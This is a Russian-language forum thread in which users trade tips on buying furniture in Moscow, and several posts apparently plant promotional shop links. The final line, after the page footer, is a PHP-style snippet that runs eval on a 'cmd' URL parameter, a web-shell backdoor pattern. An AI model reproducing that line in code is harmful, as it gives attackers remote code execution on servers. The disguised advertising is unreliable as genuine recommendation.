+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Элитная мебель


  1. #1
    Мимо проходил volter is on a distinguished road Аватар для volter
    Регистрация
    03.01.2019
    Откуда
    .
    Машина
    Временный пешеход
    Сообщений
    9

    Элитная мебель

    Давно уже мечтаю купить современную, стильную мебель европейского качества, которая бы в выгодном свете подчеркнула интерьер моего дома в Москве. В данный момент рассматриваю различные варианты и предложения в интернете по этому поводу. Нашел портал, где предоставлен каталог элитной, итальянской мебели известных брендов https://www.myarredo.ru/ . И вот на этом сайте, мне очень понравился комод с рельефным декором, который стоит более семи тысяч евро. Что, мягко говоря, дороговато для моего бюджета. Может Вы поделитесь, где предпочитаете покупать себе качественные и красивые на вид мебельные изделия?

  2. #2
    Мимо проходил genka is on a distinguished road Аватар для genka
    Регистрация
    21.12.2018
    Откуда
    Россия
    Машина
    Golf
    Сообщений
    11
    Лично мне очень нравится презентабельная, стильная мебель от различных европейский производителей. Но тоже позволить себе купить такие новые мебельные изделия не могу. Поэтому, как вариант, покупал относительно недорого подержанную мебель по частным объявлениям в интернете.

  3. #3
    Мимо проходил masik is on a distinguished road Аватар для masik
    Регистрация
    28.12.2018
    Откуда
    .
    Машина
    Golf 1
    Сообщений
    11
    Ну не знаю, я вот практически всегда покупаю мебель в дом на местных рынках по доступным, демократическим ценам. И насчет качества пока проблем особых и не было.

  4. #4
    Мимо проходил tatarin is on a distinguished road Аватар для tatarin
    Регистрация
    22.12.2018
    Откуда
    .......
    Машина
    ......
    Сообщений
    14
    А я вот больше доверяю мебельным салонам города, когда дело касается покупки какой-нибудь мебели в дом. Да и часто в мебельных магазинах можно попасть на выгодные распродажи, акции.

  5. #5
    Мимо проходил iljas is on a distinguished road Аватар для iljas
    Регистрация
    23.12.2018
    Откуда
    .
    Машина
    Volkswagen
    Сообщений
    12
    Вы знаете, мне и самому нужна качественная, функциональная мебель в дом, которую хотелось бы купить в Москве по честным, демократическим ценам. Но в первую очередь, меня интересует стенка в гостиную, а то старая уже совсем в плохом состоянии. Как вариант, нашел интернет-магазин, где продаются стенки в зал от разных производителей https://lubidom.ru/catalog/gostinye/stenki-v-zal/ . Если не найду более выгодный предложений, то может остановлю свой выбор и на этом сайте.

  6. #6
    Мимо проходил Larik is on a distinguished road Аватар для Larik
    Регистрация
    04.01.2019
    Откуда
    Россия.
    Машина
    Golf 4
    Сообщений
    65
    Мы с женой искали шкаф, решили поменять, а то наш уже старенький, давно его надо было выбросить, все руки не доходили. И хочу сказать, что ничего интересного не нашли, пришлось делать на заказ. Уже неделю ждем, вроде обещали после праздников будет готов. Надеюсь, все будет хорошо, и не придется переделывать.

  7. #7
    Мимо проходил Doper is on a distinguished road Аватар для Doper
    Регистрация
    27.12.2018
    Откуда
    Россия
    Машина
    Volkswagen
    Сообщений
    71
    У меня всегда были трудности с выбором мебели. В магазинах в принципе ассортимент большой, но качество мебели отвратительное. Обошел все магазины, не смог выбрать себе хорошую, добротную кровать. Решил поискать в интернете, на днях наткнулся на один сайт, здесь неплохой выбор кроватей из массива дерева, вот сижу, выбираю https://raiton.ru/category/krovati/krovati-iz-massiva/ . Если вы еще не определились с выбором, то, как вариант посмотрите еще на том сайте, может, что понравится.

  8. #8
    Мимо проходил Zelen' is on a distinguished road Аватар для Zelen'
    Регистрация
    02.05.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    61
    Цитата Сообщение от Larik Посмотреть сообщение
    Мы с женой искали шкаф, решили поменять, а то наш уже старенький, давно его надо было выбросить, все руки не доходили. И хочу сказать, что ничего интересного не нашли, пришлось делать на заказ. Уже неделю ждем, вроде обещали после праздников будет готов. Надеюсь, все будет хорошо, и не придется переделывать.
    искали шкаф, а нашли подставку для ручек. срочно ее кому-то подарите. не пропадать же столь гениальному подарку.

+ Ответить в теме

Похожие темы

  1. Кухонная мебель
    от iljas в разделе Курилка
    Ответов: 5
    Последнее сообщение: 30.05.2021, 07:50
  2. Мебель в гардеробную
    от jordy в разделе Курилка
    Ответов: 3
    Последнее сообщение: 28.12.2018, 15:34

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}